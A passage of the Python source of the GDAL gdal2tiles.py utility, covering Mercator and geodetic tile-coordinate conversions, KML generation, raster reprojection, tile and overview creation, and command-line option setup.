http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier[0] = 0
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail, queue=None):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger in then the tile_size
# We scale down the query to the tile_size by supplied algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tile_size - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ty, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (y, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
p.add_option('--tmpdir', dest="tmpdir",
help="Temporary files directory. Passed by R.")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
